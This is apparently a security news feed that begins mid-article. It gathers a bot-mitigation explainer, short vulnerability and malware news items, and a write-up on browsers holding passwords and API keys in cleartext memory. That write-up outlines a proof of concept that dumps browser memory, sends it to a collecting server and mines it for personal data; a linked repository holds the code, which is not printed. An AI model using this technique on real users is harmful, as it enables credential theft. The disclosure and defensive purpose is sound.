Zero-Day world is a bit like an intense game of hide-and-seek, with hackers hunting for vulnerabilities and developers racing against time to fix them. Every day, new flaws are discovered, and new attacks are launched. But here’s the fun part — this game is far from over! The cybersecurity community is always discovering new ways to detect and prevent these types of attacks.So, while Zero-Day exploits are a serious threat, they also serve as a reminder of the constant need for cyber vigilance and innovation. Staying curious and keeping up with cybersecurity trends is key to being one step ahead.Final ThoughtsZero-Day exploits might sound like something straight out of a cyber-thriller, but they are real, and they’re constantly evolving. They remind us how vulnerable and exposed we are in the digital world — and why we need to be constantly aware of the risks and defenses that shape our online lives.Just remember: In cybersecurity, the game is always changing. And the more we understand, the better we can defend ourselves!Zero Day Exploit was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

Learn about OWASP's Top 10 – 2021 web security flaws findingsContinue reading on InfoSec Write-ups »

by InfoSec Write-ups

IntroductionThe internet ecosystem, vital for global communication, commerce, and innovation, is increasingly polluted by “bad bots” — malicious automated programs that conduct various nefarious activities. From data scraping and credential stuffing to orchestrating denial-of-service attacks, bots have grown both in volume and sophistication.By 2023, bots accounted for 47% of all internet traffic, with bad bots responsible for over 30% of that share. This dominance reflects a major threat to businesses globally, with an estimated $40 billion lost annually due to bot-related activities. During key periods, such as holiday shopping seasons, bot traffic can surge beyond 30%, making it harder for website owners to differentiate between legitimate users and malicious traffic.Interesting facts further highlight the gravity of the situation:1 second of page load delay caused by bot-induced server overload can reduce conversion rates by 7%.50% of login attempts globally are linked to bots attempting credential stuffing.Bots often exploit older mobile app versions, which may lack updated defenses, during the transition to newer versions.The race between bot evolution and countermeasures continues to shape cybersecurity strategies.The Scope of the Bot ProblemBad bots make up nearly 30% of all internet traffic, a startling figure that highlights the widespread nature of the problem. This bot-driven traffic is responsible for costing businesses over $40 billion annually. Bots are increasingly targeting all aspects of the web, from scraping content and pricing data to conducting sophisticated fraud schemes like credential stuffing and account takeovers​The First Generation: Basic AutomationCharacteristicsThe first-generation bots, emerging in the early 2000s, were simplistic and relied on basic scripts written in languages like Python, PHP, or Perl. They targeted HTTP endpoints using direct, rule-based logic. Their operations were straightforward but effective for early threats.Examples of Malicious ActivitiesWeb Scraping: Automated tools like curl and BeautifulSoup extracted product pricing, proprietary data, or entire web pages.Spamming: Bots automated form submissions to post advertisements or send phishing messages.Credential Stuffing: Exploited breached credentials to access user accounts via repetitive HTTP POST requests.How Organizations RespondedStatic IP Blocking:Analyzed server logs for repeated requests and blocked suspicious IPs via firewalls like iptables.Limitations: Proxy servers quickly bypassed IP blocks.Rate-Limiting and Throttling: Controlled traffic flow using tools like Nginx modules.CAPTCHAs:Early CAPTCHAs challenged users with text or image recognition tasks. However, these slowed legitimate users and were ineffective against advanced automation.The Second Generation: Stealth and MimicryAs first-generation defenses matured, bots evolved. Second-generation bots were stealthier and designed to mimic human behavior.AdvancementsIP Rotation: Used proxy pools like ProxyMesh to evade static IP blocking.Headless Browsers: Tools such as Puppeteer and Selenium could execute JavaScript, bypassing detection based on client-side scripts.Behavioral Mimicry: Generated randomized mouse movements and typing delays to resemble human interactions.Challenges and CountermeasuresCredential Stuffing at Scale: Sophisticated frameworks like Sentry MBA exploited login portals.Behavioral Analytics: Machine learning models analyzed anomalies in interaction patterns to flag bots.Dynamic CAPTCHAs: Risk-based challenges were introduced but were increasingly bypassed using CAPTCHA-solving services like 2Captcha.The Third Generation: AI-Driven BotsThird-generation bots integrated machine learning for adaptability and decision-making, pushing bot sophistication to unprecedented levels.CapabilitiesMachine Learning Mimicry: Bots trained on datasets to replicate human interactions, including navigation paths and click sequences.API Exploitation: Targeted GraphQL APIs to extract data, bypassing web GUIs entirely.Autonomy: Bots self-optimized their attack strategies using feedback from failed attempts.Defensive ChallengesEven with tools like Akamai Bot Manager and Cloudflare Bot Management, the evasion of JavaScript challenges and high traffic volumes made detection increasingly resource-intensive.How Bots Make Life Difficult for Website OwnersBots complicate operations for website owners in various ways:Performance Degradation:· High traffic from bots causes slower page load times or outright server crashes· Overloaded systems during peak periods, such as holiday sales, result in lost revenue2. Analytics Distortion:· Bots inflate metrics like page views, making it difficult to assess genuine user engagement· Marketing campaigns based on skewed data may lead to poor ROI3. Fraudulent Activities:· Credential stuffing, inventory hoarding, and fake account creation drain organizational resources· Carding bots test stolen credit cards, causing financial loss and reputational damage4. Escalating Costs:Detecting and mitigating bots requires expensive tools, increasing operational overhead.Key Mechanisms in Bot DetectionModern anti-bot solutions employ a multi-layered approach to differentiate bots from legitimate users:Behavioral Analysis: Solutions monitor and analyze traffic patterns, user actions, and session flows. For example, bots often bypass genuine workflows (like navigating through a website) and directly request endpoints or URLs. Machine learning models are trained on these behaviors to identify anomalies.Device and Browser Fingerprinting: Unique attributes of the client device and browser, such as screen resolution, installed plugins, and HTTP headers, are recorded. Suspicious patterns, like identical fingerprints across multiple requests, are flagged.JavaScript Challenges: Many bots fail to execute JavaScript properly. Anti-bot tools use embedded scripts to evaluate client behavior, detecting headless browsers or automated scripts.Behavioral Biometrics: This includes monitoring fine-grained user activities like mouse movements, typing speed, and touch gestures (for mobile devices). Human interactions have organic patterns that are challenging for bots to mimic.Dynamic Challenges:CAPTCHA and Crypto Challenges: Bots are challenged with tasks that require human-like reasoning or expend computational resources, increasing the cost of attacks. CAPTCHAs-as-a-service has emerged as an underground market, where bots outsource CAPTCHA solving to human solvers or advanced AI.Private Access Tokens: Emerging techniques like those used by Cloudflare eliminate traditional CAPTCHAs, relying on secure tokens that validate legitimate users based on hardware and software attestations.6. API and Mobile-Specific Features:Anti-bot systems evaluate mobile-specific attributes, such as the tilt and posture of the device during interactions, gyroscope data, and app-specific behaviors, to detect automation.For mobile apps, tools like Akamai’s Bot Manager assess app integrity, session anomalies, and usage patterns to flag bot activity.Challenges of Older Mobile App VersionsWhen mobile applications do not enforce mandatory updates, older versions remain susceptible to bot attacks. These outdated apps may lack the latest security patches, like anti-bot scripts or enhanced validation mechanisms. Organizations face a balancing act:Security Risks: Old versions can be exploited by bots for account takeovers, API abuse, or credential stuffing.User Experience: Forcing updates too aggressively might alienate users or cause retention issues.Solutions like Akamai and F5 Distributed Cloud Bot Defense address this by applying centralized bot management across all endpoints, including APIs and mobile app traffic, irrespective of app version.Commercial Bot Management Solutions and Detection TechniquesAkamai Bot Manager leverages behavioral analysis, device fingerprinting, and machine learning to detect bots effectively. It excels in granular bot categorization and dynamic mitigation strategies.Cloudflare Bot Management integrates seamlessly with its extensive global edge network. It uses JavaScript challenges, machine learning, and fingerprinting but is also highly reliant on its CDN infrastructure.Imperva Advanced Bot Protection focuses on client-side integrations for bot detection, employing server-side behavioral analysis and reputation-based filtering.DataDome emphasizes real-time traffic analysis through machine learning and AI-powered detection, with strong support for mobile and API traffic.PerimeterX Bot Defender is known for advanced user behavior analytics and employs contextual signals to differentiate between humans and bots effectively.Deployment Models:Akamai and Cloudflare are primarily edge-based solutions, benefiting from their CDN capabilities to offer high-speed processing and minimal latency.Imperva and PerimeterX provide flexible deployment options, including cloud-based, on-premises, or hybrid solutions.DataDome supports easy SaaS integration, targeting modern application architectures.Focus Areas:Akamai and Cloudflare often appeal to enterprises already using their CDN services, offering robust bot protection as an added layer.Imperva and DataDome are popular in e-commerce and financial services for mitigating sophisticated threats like scraping and credential stuffing.PerimeterX is a strong choice for applications requiring detailed behavioral analytics.Challenges and CAPTCHA Management:CAPTCHA implementations vary; some solutions, like Akamai and Imperva, allow integration with multiple CAPTCHA providers or leverage their proprietary ones.DataDome prioritizes minimizing user friction with adaptive challenges, and PerimeterX uses “invisible challenges” to reduce disruptions for legitimate users.Mobile and API Support:Solutions like DataDome and PerimeterX have advanced support for securing mobile apps and APIs, with capabilities to detect anomalies in API calls or suspicious patterns of mobile app usage.Reporting and Insights:DataDome and Akamai are lauded for detailed dashboards and actionable analytics, helping security teams gain insights into bot traffic.Cloudflare provides streamlined integration with its broader suite but may lack the depth of reporting compared to specialized solutions like PerimeterX.Pricing and Scalability:Cloudflare offers competitive pricing with its bundling of bot protection into other services, making it appealing for SMEs.Akamai, Imperva, and PerimeterX are typically more enterprise-focused, with pricing scaling based on usage and customization.When a bot is discovered, modern bot mitigation solutions offer a range of flexible response actions. These actions help organizations tailor their defenses based on the bot’s threat level, the application’s sensitivity, and the desired user experience.Possible Actions when Bots are identified:1. Deny Request (Hard Block)Description: The system outright denies the bot’s request by returning an HTTP 403 (Forbidden) status code.Use Case: Effective against known malicious bots or high-confidence detections of harmful activity (e.g., credential stuffing).Pros: Direct and clear-cut; stops malicious activity immediately.Cons: Determined bots may retry from a different IP or leverage proxy pools to evade blocking.2. Drop Request (Silent Block)Description: The server silently drops the request without responding, effectively causing a timeout for the bot.Use Case: Useful for bots that retry aggressively, as it wastes their resources by forcing them to wait.Pros: Reduces server load by not processing a response; confuses bots.Cons: May increase retry rates, leading to potential resource exhaustion on the server.3. TarpittingDescription: The server intentionally delays its response to the bot, slowing down its operations.Use Case: Designed to reduce the effectiveness of high-frequency attacks like scraping or brute-force attempts.Pros: Wastes bot resources and reduces the number of requests they can send in a given time.Cons: May still consume server resources for extended periods, especially during high traffic.4. Challenge with CAPTCHADescription: The system presents a CAPTCHA (e.g., Google reCAPTCHA or hCaptcha) to verify human users.Use Case: Best suited for medium-confidence detections or scenarios where false positives need to be avoided.Pros: Reduces the chance of blocking legitimate users; highly effective against simple bots.Cons: Advanced bots use CAPTCHA-solving services (e.g., 2Captcha) or AI-based solvers to bypass challenges​5. Serve Static PageDescription: The bot is redirected to a generic static page, often displaying minimal content or error messages.Use Case: Used for bots scraping dynamic data, such as product pricing or proprietary content.Pros: Prevents sensitive data from being exposed while conserving backend resources.Cons: Bots may still access non-critical static content unless actively redirected or monitored.6. Redirect to HoneypotsDescription: Malicious requests are redirected to deceptive endpoints designed to monitor or waste bot resources.Use Case: Ideal for gathering intelligence on bot behaviors or pre-emptively flagging malicious IPs.Pros: Offers insights into attack vectors; can waste bot resources without affecting legitimate users.Cons: Requires careful setup to ensure legitimate users are not inadvertently redirected.7. Throttling or Rate LimitingDescription: Restricts the frequency of requests from a suspected bot by slowing down or limiting its traffic.Use Case: Best for scenarios where low-confidence detection is likely, or during high traffic events.Pros: Reduces server strain and prevents abuse without outright blocking traffic.Cons: May impact legitimate high-frequency users, such as API consumers.8. Alert and MonitorDescription: Suspicious activity is logged and flagged for review without taking immediate action against the bot.Use Case: Useful for low-confidence detections or when tracking bot behavior is prioritized over blocking.Pros: Provides actionable data without disrupting user experience.Cons: Does not mitigate immediate threats.9. Behavioral AdaptationDescription: Some solutions dynamically modify page content or functionality to confuse bots, such as changing form field names or injecting random delays in page loading.Use Case: Effective against bots using hardcoded or predictable scripts.Pros: Adds complexity to automated attacks, forcing bot creators to adapt constantly.Cons: May introduce additional latency or complexity for legitimate users.10. Mobile-Specific ActionsIn mobile apps, bot defense actions often include additional layers:Verification of Device Integrity: Detect if an app is running on an emulator or a jailbroken/rooted device.User Interaction Validation: Bots are detected based on anomalies in touch gestures or accelerometer data.Session Token Revocation: Suspicious sessions are terminated, and reauthentication is required.Open Source SolutionsTools and FrameworksModSecurity:Open-source WAF that provides bot detection and blocking rules.Implementation Example: Use the OWASP CRS (Core Rule Set) to block bot-like patterns in HTTP requests.2. Fail2Ban:Although primarily designed to prevent brute-force attacks, Fail2Ban can block bots by analyzing server logs for repeated malicious activity.3. BotSentry:Open-source framework focusing on real-time bot traffic analysis and mitigation.Advantages and LimitationsPros: Cost-effective and flexible.Cons: High technical expertise required for configuration and maintenance.ConclusionThe evolution of bad bots from simple scripts to sophisticated AI-driven systems illustrates the dynamic and relentless nature of cyber threats. Modern bots pose significant challenges, targeting vulnerabilities across web applications, APIs, and even mobile apps with non-automatic updates. Their ability to mimic human behavior, solve CAPTCHAs through third-party services, and exploit system loopholes makes them a formidable adversary.Organizations must adopt multi-layered, adaptive bot management strategies to keep pace. While commercial solutions like Akamai Bot Manager, Cloudflare Bot Management, and Imperva Advanced Bot Protection offer robust defenses, they are not without limitations. Open-source alternatives and custom-built solutions provide flexibility and cost-effectiveness but demand significant expertise.Additionally, website owners face challenges beyond technical defenses, including maintaining user experience while combating bots, dealing with fluctuating bot traffic, and addressing gaps in mobile app updates. Eye-opening statistics — such as bots accounting for nearly half of all internet traffic — highlight the urgent need for comprehensive mitigation measures.Ultimately, defending against bots is not a one-time effort but an ongoing process requiring innovation, vigilance, and strategic investment. By staying informed and leveraging advanced technologies, businesses can protect their assets, users, and reputations in an increasingly automated and adversarial digital landscape.Bad Bots: The Unseen Cyber Threat and the Fight to Secure the Internet was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

Modern — Day Cybersecurity AttackContinue reading on InfoSec Write-ups »

by InfoSec Write-ups

Imagine navigating a labyrinth where the walls constantly shift, and the path ahead is obscured by fog. If this brings up a visceral image, you’ve either seen David Bowie’s iconic film or are very familiar with the real-world challenge of compliance in today’s fast-paced business environment. Just as in the labyrinth, where every turn can lead to unexpected challenges or opportunities, companies face a complex maze of regulatory requirements. As a CSO, your role demands … More → The post Navigating the compliance labyrinth: A CSO’s guide to scaling security appeared first on Help Net Security.

by Help Net Security

In this Help Net Security interview, Stuart McClure, CEO of Qwiet AI, discusses the evolution of code scanning practices, highlighting the shift from reactive fixes to proactive risk management. McClure also shares his perspective on the future of AI-driven code scanning, emphasizing the potential of machine learning in threat detection and remediation. How have you observed code scanning practices evolve in recent years, especially with cloud adoption and DevSecOps? Code scanning has come a long … More → The post Transforming code scanning and threat detection with GenAI appeared first on Help Net Security.

by Help Net Security

According to Gartner, the broad range of pricing for government, risk, and compliance (GRC) tools requires enterprise risk management (ERM) leaders to be well-versed in distinct pricing tiers of GRC solutions. In this Help Net Security video, Joel Backaler, Director/Analyst, Risk Technology & Analytics at Gartner, discusses how ERM leaders consider several critical questions to determine which GRC solution tier best aligns with their needs. Fill out the form to download your copy: The post Evaluating GRC tools appeared first on Help Net Security.

by Help Net Security

In 2024, election officials and law enforcement shared intelligence closely to counter complex threats.

by Cybersecurity Dive

ScubaGear is an open-source tool the Cybersecurity and Infrastructure Security Agency (CISA) created to automatically evaluate Microsoft 365 (M365) configurations for potential security gaps. ScubaGear analyzes an organization’s M365 tenant configuration, offering actionable insights and recommendations to help administrators address security gaps and strengthen defenses within their Microsoft 365 environment. The private sector, critical infrastructure, and all levels of government utilize the tool. ScubaGear’s reports guide organizations in quickly identifying and addressing configuration vulnerabilities, reducing … More → The post ScubaGear: Open-source tool to assess Microsoft 365 configurations for security gaps appeared first on Help Net Security.

by Help Net Security

Cybercrime reporting mechanisms vary across the globe, with each country offering different methods for citizens to report cybercrime, including online fraud, identity theft, and other cyber-related offenses. Victims are usually instructed to complete an online form that asks for personal details, a description of the crime, and any collected evidence. While online reporting forms are commonly used, in certain situations, it may be more effective to visit a local police station and report the crime … More → The post How and where to report cybercrime: What you need to know appeared first on Help Net Security.

by Help Net Security

This vulnerability allows remote attackers to bypass authentication on affected installations of Progress Software WhatsUp Gold. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 9.8. The following CVEs are assigned: CVE-2024-7763.

by Zero Day Initiative Advisories

Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. New Campaign Uses Remcos RAT to Exploit Victims Bengal cat lovers in Australia get psspsspss’d in Google-driven […]

by Security Affairs

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. A botnet exploits e GeoVision zero-day to compromise EoL devices Palo Alto Networks confirmed active exploitation of recently […]

by Security Affairs

Threat actors increasingly use Scalable Vector Graphics (SVG) attachments to display phishing forms or deploy malware while evading detection. [...]

by BleepingComputer

A critical authentication bypass vulnerability has been discovered impacting the WordPress plugin ''Really Simple Security'' (formerly ''Really Simple SSL''), including both free and Pro versions. [...]

by BleepingComputer

Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Microsoft fixes actively exploited zero-days (CVE-2024-43451, CVE-2024-49039) November 2024 Patch Tuesday is here, and Microsoft has dropped fixes for 89 new security issues in its various products, two of which – CVE-2024-43451 and CVE-2024-49039 – are actively exploited by attackers. Massive troves of Amazon, HSBC employee data leaked A threat actor who goes by the online moniker “Nam3L3ss” has leaked … More → The post Week in review: Microsoft patches actively exploited 0-days, Amazon and HSBC employee data leaked appeared first on Help Net Security.

by Help Net Security

In 2024, the cybersecurity landscape is at a pivotal moment, shaped by rapid technological advancements and the increasing sophistication of cyber threats. The rise of […]

by Privacy Affairs

A botnet employed in DDoS or cryptomining attacks is exploiting a zero-day in end-of-life GeoVision devices to grow up. Researchers at the Shadowserver Foundation observed a botnet exploiting a zero-day in GeoVision EOL (end-of-Life) devices to compromise devices in the wild. The GeoVision zero-day, tracked as CVE-2024-11120 (CVSS 9.8), is a pre-auth command injection vulnerability […]

by Security Affairs

Even if you follow security best practices and choose bcrypt for password hashing you can still get it wrong. How does Bun handle it in a more secure fashion? What happened with the Okta bcrypt incident? Lets dive in.

by Node.js Security

Google’s Gemini AI Chatbot faces backlash after multiple incidents of it telling users to die, raising concerns about…

by Hackread

A highly dangerous vulnerability in the Really Simple Security plugin, affecting over 4 million WordPress websites, has been disclosed by Wordfence. The flaw, rated with a CVSS score of 9.8 (critical), allows attackers to bypass authentication and gain administrative control over affected sites. Both free and premium versions of the plugin, previously known as Really … The post Critical Authentication Bypass Flaw Affects 4 Million WordPress Sites appeared first on CyberInsider.

by Cyber Insider

Introduction: How Browsers handle your Data InsecurelyAre you browsing on Chrome, Firefox, Brave, or Edge? It might feel safe, but what if I told you that everything you do on those browsers — passwords, credit card details, and sensitive data — could be stolen by a ‘local attacker’; Sounds a bit anticlimactic, right? After all, couldn’t an attacker just install a keylogger or use remote desktop control?Sure, keyloggers and remote desktop tools can capture what you type or click in real time. But what if the sensitive data isn’t something you directly input — maybe it’s information sent by the server for you to view only? A keylogger wouldn’t catch that. Now imagine that even after you stop actively browsing & forgot to terminate your browser.exe, your browser’s memory still contains sensitive data from the entire session, including historical information stored since you first opened it, including the ones you had in the Incognito tab. With that much access, a simple keylogger becomes obsolete.The Holy Grave: Clear text Storage in MemorySo let me introduce you to the premise of this article, CWE-316: Cleartext Storage of Sensitive Information in Memory. Let’s dive in to understand how this works and why it’s a pain to mitigate the issue which exists clearly in so many thick clients.https://cwe.mitre.org/data/definitions/316.htmlCWE 316 — Cleartext storage of Sensitive Information in MemoryLet’s get a general idea about how memory works in windows & storing data in it. Consider an example of typing a word on a website in your browser.<skip this if you already know this , I didn’t so maybe you’re like me>When you open the browser, the Windows operating system loads browser.exe into memory. This involves mapping the program’s executable file into the process’s virtual address space. The OS allocates resources (memory, CPU time, etc.) to the browser process.The OS allocates memory pages (chunks of memory) to the browser process. Windows uses virtual memory, so these pages correspond to virtual addresses initially, later mapped to physical RAM. The browser initializes by loading its configuration settings, resources, and any cached data (like cookies) from previous sessions. These are loaded into memory as well.When you access Google, the browser loads the Google search page. This involves downloading the HTML, CSS, and JavaScript for the page, which are then rendered to create the Document Object Model (DOM) in memory. The DOM is a structured representation of the web page, stored as a tree of objects in the browser’s memory.The rendering engine handles how the page looks on the screen, while JavaScript is responsible for any dynamic functionality, such as auto-suggest for search terms. This JavaScript code is executed in the browser’s JavaScript engine, and relevant objects, functions, and variables are stored in memory.As you start typing, each letter you input is temporarily stored in a buffer. The OS manages this with input/output (I/O) operations through low-level drivers. This buffer is then used by the browser to display the text in the search bar.The browser stores your input in its memory, in a section allocated for handling the DOM and related interactions. The input data, like the search term you entered, is stored as a string object in memory.Now this input could be anything like a password , email, phone number or a sensical search “ How to hack nasa with html ???“< this is where your skipping ends mate if you knew the shenanigans >When you press “Enter” or click the action button or placeholder, the browser prepares an HTTP request to the website’s servers, containing your valuable information. The request includes headers and your string, which are stored temporarily in the memory buffer while the request is sent.The response comes back from the server and vola you see you wanted to with the string you entered. When you close the browser, Windows receives a termination signal from browser.exe. This signals the OS to begin releasing resources tied to the browser process. Deallocating Virtual Memory: Windows clears the virtual memory allocated to the browser, deallocating any memory pages and marking them as free.So you don’t see a problem ?Well the issue starts with 2 conditions which is generally true for most of the browsers :You run with browser.exe with low privilegesHence you are able to dump the memory for processes related to browser.exeTo understand the problem let’s open Firefox 132.0.2 and browse to google.com in a tab and then open paypal in an incognito tab.Here’s our google.com that we might use later , but now I have to complete some payments so I open up paypal in the incognito tab.I input in credentials & login to my account which you’re not allowed to see !Further I logout of paypal & close the incognito tab when my task is complete with paypal.I left the browser open with google in a tab thinking I will later have to search something up like how to secure my password ? This is an absurd abstraction of the idea but Hey , when was the last time you closed all the tabs of your browser when you’re committed to work a long shift ?Now I fire up the portable version of process hacker & try to view the properties of the parent process of all other firefox children which I will be explaining very soon.So we go Properties > Memory > Strings > Filter > ContainsAnd I input the password whichI used for paypal login & as we hit enter we can see that theThe password is still present in the memory even though we have closed the tab related to it.Password is in plaintext in the memory.We can also repeat the same with our email & find that the data is still stored in the memory.Now we can clearly see that the data we gave as input is clearly saved in memory of the process even after we have closed the tab associated with it effectively closing the child process associated with that particular tab.But now let’s have a look about the data which we get from the server sideWe will open a page which might contain some sensitive data , for example here I will open a documentation page with a sample firebase api key.We will repeat the same process of keeping an idle tab and closing the tab in which we opened the webpage with the api key . Now we will look in Process Hacker to look for the key in the memory & we can successfully find the api key in plaintext in the memory of the parent process.Securely Sandboxed ? but from Whom ?Now there are a lot of questions popping up like understanding how a browser works & “Sandboxing” on which we rely so much for keeping us secure.Pressing Shift + Esc on all the browsers generally opens the Process Manager / Task Manager for the browser where we can see the pid related with different tasks.Diagram of processes used by Firefox. All child processes are spawned and managed by the Parent process. ( Source : Process Model, Firefox Source Docs )https://firefox-source-docs.mozilla.org/dom/ipc/process_model.htmlHere is a brief overview of what these processes do :Parent Process: Manages UI, handles privileged operations, and coordinates resource allocation and IPC (Inter-Process Communication).Content Process: Runs web content in sandboxed environments for security and stability, separating each tab into distinct processes.GPU Process: Offloads all graphics rendering tasks to the GPU, improving rendering efficiency and reducing main process load.WebExtension Process: Isolates extensions from core operations to minimize potential risks from third-party code.RDD (Remote Data Decoder) Process: Processes media decoding, offloading tasks to enhance performance and security for media playback.Socket Process: Manages network socket connections independently of content processes, enhancing network security and reliability.Finally we have processes related to each active webconnection you make from the browser which is opened separately in individual child processes.General Visualization of how different websites are opened in different processes.Browser sandboxing is often misunderstood as a guarantee that all code within the browser runs in a secure, isolated environment. However, a more accurate view is that the processes handling different browser tabs are isolated from each other. But an external process outside the browser could still potentially access the memory contents of these browser processes.This means that, while browser tabs are isolated in sandboxing, the overall sandbox isn’t completely impervious to external processes accessing its memory.You might think that this is an issue related to firefox but upon checking all the popular browsers , the result remains the same.Browsers tested : 15/11/2024Google Chrome Version 131.0.6778.70Brave Version 1.73.89Firefox 132.0.2Edge Version 131.0.2903.48Scenario: What an Attacker Can DoNow let’s see a perspective where a potential malicious actor could abuse this weakness.Here is the whole implementation which is a simple Proof of Concept far from what an APT group would come up with. Github Repo :https://github.com/Shauryae1337/Browser-Memory-Exfiltration/So we have a powershell script which does exactly what the virustotal has predicted !But we still have the antivirus vendors thinking “Yeah we can allow that for sure !”We have an exploit.ps1 which does the above mentioned.Then we have a server which receives the memory dump & stores it.Once we have the memory dump we can proceed with extracting strings or even files, since due to ASLR the dump is a jumbled treasure of your browser activity & the information it contains.For proof of concept I have added a script which can analyze the strings extracted & dig out some information such as phone numbers , emails and domains along with their frequency of appearance.Extracting information might take a while since we have to do a lot of regular expressions , frequency analysis and removing duplicates. We can enhance the information extraction overtime with enough research.My email which I have for all public interactions at the top along with some data that fits in the regex used for filtering the data along with the frequency count.Some of the phone numbers & IP Addresses which were found in the dump.Most found domains in my activity, where an attacker would certainly look for crucial websites.We can also use other tools like volatility framework or binwalk to extract more data , just depending upon the caliber of the forensic knowledge of the actor.Mitigations which aren’t Mitigating the issueWhen we talk about mitigation there are two very good points to start with :A. Encrypting Data in MemoryB. Clearing Data once it has been usedSo here are two examples which we can use to create a simple sample program which can store our data in memory safely and return it upon request. I have attached the source code for mitigations in the repo :Mitigation 1: XOR Encryption with VirtualLock and Secure Memory AllocationWhile XOR encryption(or any other encryption) by itself is not considered secure for protecting sensitive data, combining it with non-pageable memory allocation and memory locking can offer some protection for data in transit or for temporary storage. You might replace the XOR with any other form of encryption Here’s how to mitigate risks using this approach:Allocate Non-Pageable MemoryRead and Store Sensitive DataEncrypt Data In-MemoryZero Out the Original PlaintextFree and Unlock MemoryStore and Handle Encrypted DataDecrypt Data (If Needed)Secure Memory ErasureMitigation 2: Using DPAPI (Data Protection API) for EncryptionThe Data Protection API (DPAPI) provides a secure, high-level solution for protecting sensitive data using encryption mechanisms built into the Windows operating system. This method should be preferred for handling sensitive data securely, as it leverages established cryptographic protocols and Windows key management features. The method is also better than one mentioned in mitigation 1 but is platform dependent. Here’s how to mitigate risks using this approach:Allocate Memory for Sensitive DataRead and Store Sensitive DataEncrypt Data Using DPAPIZero Out Plaintext After EncryptionFree and Unlock Memory (If Locked)Store or Use Encrypted DataDecrypt Data When NeededSecure Memory ErasureChecking the same attack against the mitigations we don’t find the secure string lying around in the memory for long in plaintext.But we have a very simple program as an example but what about something which has such a large amount of data to hold like a `Browser`. Will it be viable to create a browser which performs all the mitigations without facing a huge impact on performance .Well we don’t have exact answers yet since I haven’t found a browser which does so , and maybe the reason is that it’s not viable to create such a browser without specific support from the operating system.But that’s a subject for another article in future , please pardon me if my understanding lacks a bit about the concept above mentioned & let me know if you have something to add upon.FinallyPRO TIP : Close all the windows of your browser once you have completed the work. ( Terminate all the processes )If you wanna update me on some root cause analysis on V8 JavaScript engine , firefox & chromium project about how & why the browsers have to keep the data in plaintext in memory even after a tab is closed then let me know . Email shaurya1337@gmail.comLinkedin https://www.linkedin.com/in/shaurya-na-725687209/Here is all Source code https://github.com/Shauryae1337/Browser-Memory-Exfiltration/Thank you so much for helping me with framing the article & all the motivation behind ! Ramya Shah https://www.linkedin.com/in/ramyashahSahil Shah https://www.linkedin.com/in/sahilshah3276Browser’s Secret Diary: Memory Dumps Unveiled was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

Palo Alto Networks confirmed active exploitation of a zero-day in its PAN-OS firewall and released new indicators of compromise (IoCs). Last week, Palo Alto Networks warned customers to limit access to their next-gen firewall management interface due to a potential remote code execution vulnerability (CVSSv4.0 Base Score: 9.3) in PAN-OS. The cybersecurity company had no […]

by Security Affairs

The U.S. Environmental Protection Agency (EPA) Report Exposes Cybersecurity Risks in US Water Systems: Vulnerabilities in Critical Drinking…

by Hackread

This flaw allows attackers to extract VPN credentials directly from memory, a tactic used in conjunction with the DEEPDATA malware to gather sensitive information from compromised systems. Despite being reported to Fortinet in July 2024, the issue remains unresolved. Discovery and Fortinet''s inaction Volexity''s researchers identified the zero-day vulnerability during the analysis of the DEEPDATA … The post Chinese Hackers Exploit Fortinet Zero-Day to Steal VPN Credentials appeared first on CyberInsider.

by Cyber Insider

This is the ninth known cyberattack to target T-Mobile in recent years, according to an ongoing count by TechCrunch. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Fake AI image and video generators infect Windows and macOS with the Lumma Stealer and AMOS information-stealing malware, used to steal credentials and cryptocurrency wallets from infected devices. [...]

by BleepingComputer

The U.S. government has made big strides over the past four years in the ongoing fight against the “scourge of ransomware,” as President Joe Biden described it. At the start of his term, Biden and his administration were quick to declare ransomware a national security threat, unlocking new powers for the military and intelligence agencies. […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Palo Alto Networks has released new indicators of compromise (IoCs) a day after the network security vendor confirmed that a zero-day vulnerability impacting its PAN-OS firewall management interface has been actively exploited in the wild. To that end, the company said it observed malicious activity originating from below IP addresses and targeting PAN-OS management web interface IP addresses

by The Hacker News

T-Mobile confirms it was hacked in the wave of recently reported telecom breaches conducted by Chinese threat actors to gain access to private communications, call records, and law enforcement information requests. [...]

by BleepingComputer

A threat actor known as BrazenBamboo has exploited an unresolved security flaw in Fortinet''s FortiClient for Windows to extract VPN credentials as part of a modular framework called DEEPDATA. Volexity, which disclosed the findings Friday, said it identified the zero-day exploitation of the credential disclosure vulnerability in July 2024, describing BrazenBamboo as the developer behind DEEPDATA,

by The Hacker News

Court filing revealed that NSO Group used WhatsApp exploits after the instant messaging firm sued the surveillance company. NSO Group developed malware that relied on WhatsApp exploits to infect target individuals even after the Meta-owned instant messaging company sued the surveillance firm. “As a threshold matter, NSO admits that it developed and sold the spyware […]

by Security Affairs

Plus: An “AI granny” is wasting scammers’ time, a lawsuit goes after spyware-maker NSO Group’s executives, and North Korea–linked hackers take a crack at macOS malware.

by WIRED Security News

GitHub projects have been targeted with malicious commits and pull requests, in an attempt to inject backdoors into these projects. Most recently, the GitHub repository of Exo Labs, an AI and machine learning startup, was targeted in the attack, which has left many wondering about the attacker''s true intentions. [...]

by BleepingComputer

Hey, i know its too late, but when i tried “bsnl” and “admin” it throws “Password is incorrect”. any idea?!

by HACKLIDO

Cybersecurity researchers have shed light on a new remote access trojan and information stealer used by Iranian state-sponsored actors to conduct reconnaissance of compromised endpoints and execute malicious commands. Cybersecurity company Check Point has codenamed the malware WezRat, stating it has been detected in the wild since at least September 1, 2023, based on artifacts uploaded to the

by The Hacker News

Email at many organizations has stopped working; the tech giant has advised users who are facing the issue to uninstall the updates so that it can address flaw.

by Dark Reading

According to Mozilla, users have a lot more power to manipulate ChatGPT than they might realize. OpenAI hopes those manipulations remain within a clearly delineated sandbox.

by Dark Reading

